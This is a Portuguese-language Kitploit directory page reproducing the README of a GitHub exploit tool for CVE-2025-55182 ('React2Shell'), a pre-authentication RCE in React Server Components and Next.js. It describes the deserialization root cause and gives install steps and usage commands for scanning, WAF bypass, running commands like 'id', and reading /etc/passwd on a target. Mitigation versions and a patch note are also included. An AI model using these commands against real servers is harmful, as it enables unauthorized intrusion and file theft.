Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182 — Exploit de RCE pré-autenticação para o CVE-2025-55182 (React2Shell) direcionado a Componentes de Servidor React. Inclui varredura, verificação OAST, bypass de WAF, execução de comandos e leitura de arquivos. | Kitploit
Ferramentas/GitHubGitHub/sentinelxofficial/cve-2025-55182
ReconhecimentoAnálise de VulnerabilidadesExploraçãoEvasão de IDS/IPSExploração de Aplicações WebBypass de WAFTestes de PenetraçãoDesenvolvimento de Payloads

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
GitHub
sentinelxofficial/cve-2025-55182

CVE-2025-55182

Exploit de RCE pré-autenticação para o CVE-2025-55182 (React2Shell) direcionado a Componentes de Servidor React. Inclui varredura, verificação OAST, bypass de WAF, execução de comandos e leitura de arquivos.

Ver Repositório
14há 2 mesesAinda não revisado
Compartilhar

CVE-2025-55182 — React2Shell

Execução Remota de Código (RCE) sem autenticação em React Server Components (RSC), Next.js e frameworks relacionados.

CVE CVSS Type Author


Visão Geral

CVE-2025-55182 (também conhecida como React2Shell) é uma vulnerabilidade crítica de RCE sem autenticação que afeta o ecossistema React Server Components (RSC). Um atacante não autenticado pode comprometer totalmente um servidor vulnerável com uma única requisição HTTP POST maliciosa.

Análise Técnica

Causa Raiz

React Server Components usa um formato de serialização personalizado chamado React Flight para serializar referências de funções e chamadas de módulos. A vulnerabilidade reside no mecanismo de decodificação de payload que processa requisições POST recebidas nos endpoints RSC.

Quando o servidor recebe um payload React Flight, ele desserializa o conteúdo sem validação adequada, confiando em campos $$typeof controlados pelo atacante e na resolução de referências de módulo. Isso permite que um atacante:

  1. Referenciar módulos internos arbitrários do Node.js (ex.: child_process, fs, net)
  2. Encadear chamadas de função através do marcador de tipo $F (função)
  3. Executar código arbitrário no runtime do servidor Node.js

Versões Afetadas

CVSS

root@kitploit:~

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H = 10.0 Critical


Funcionalidades

  • Scan (Scanner) – Detecta endpoints RSC vulneráveis e identifica versões do Next.js/React.
  • Verificar (OAST) – Envia payloads out‑of‑band para confirmar RCE através de callbacks DNS/HTTP.
  • Bypass (Evasão) – Evasão abrangente de WAF/IDS: mutações de content-type, codificação de payload, spoofing de cabeçalhos, variantes de caminho e payloads WAF.
  • Executar – Executa comandos arbitrários no sistema alvo (ex.: id, whoami).
  • Ler – Lê arquivos arbitrários do servidor (ex.: /etc/passwd, package.json).
  • Saída JSON – Resultados legíveis por máquina para integração.

Instalação

root@kitploit:~
git clone https://github.com/SentinelXofficial/CVE-2025-55182
cd CVE-2025-55182
pip install -r requirements.txt

Usage

Basic Scan

root@kitploit:~
python3 poc.py -t https://target.com
python3 poc.py -t https://target.com --timeout 15
python3 poc.py -t https://target.com --json

Verify RCE with OAST

root@kitploit:~
python3 poc.py -t https://target.com -m verify --oast your.oast.domain

Full Bypass Testing

root@kitploit:~
python3 poc.py -t https://target.com -m bypass --verbose

Execute Commands

root@kitploit:~
python3 poc.py -t https://target.com -m exec --cmd "id"
python3 poc.py -t https://target.com -m exec --cmd "whoami" --timeout 20

Read Files

root@kitploit:~
python3 poc.py -t https://target.com -m read --file "/etc/passwd"
python3 poc.py -t https://target.com -m read --file "/app/package.json"

Using a Proxy (e.g., Burp Suite)

root@kitploit:~
python3 poc.py -t https://target.com --proxy http://127.0.0.1:8080

Estrutura de Arquivos

root@kitploit:~
CVE-2025-55182/
├── README.md
├── poc.py
├── requirements.txt
└── exploit/
    ├── __init__.py
    ├── payloads.py
    ├── scanner.py
    ├── bypass.py
    └── rce.py

Mitigação

Patch (Recomendado)

root@kitploit:~
npm install [email protected]
npm install [email protected] [email protected]

Soluções Temporárias

· Desabilitar Server Functions ("use server") · Regras de WAF para bloquear Content-Type: text/x-component · Segmentação de rede para endpoints RSC


Referências

· https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components · https://www.cve.org/CVERecord?id=CVE-2025-55182 · https://nvd.nist.gov/vuln/detail/CVE-2025-55182


Aviso: Apenas para testes de segurança autorizados.

Autor: SentinelX · https://t.me/SentinelXsecurity

root@kitploit:~
Baixar ferramenta
PacoteVulnerávelCorrigida
react-server-dom-webpack19.0.0 – 19.2.0≥ 19.2.1
react-server-dom-parcel19.0.0 – 19.2.0≥ 19.2.1
react-server-dom-turbopack19.0.0 – 19.2.0≥ 19.2.1
next (13.x)13.3.0 – 13.5.x≥ 14.2.35
next (14.x)14.0.0 – 14.2.34≥ 14.2.35
next (15.x)15.0.0+ (ver patch)versões corrigidas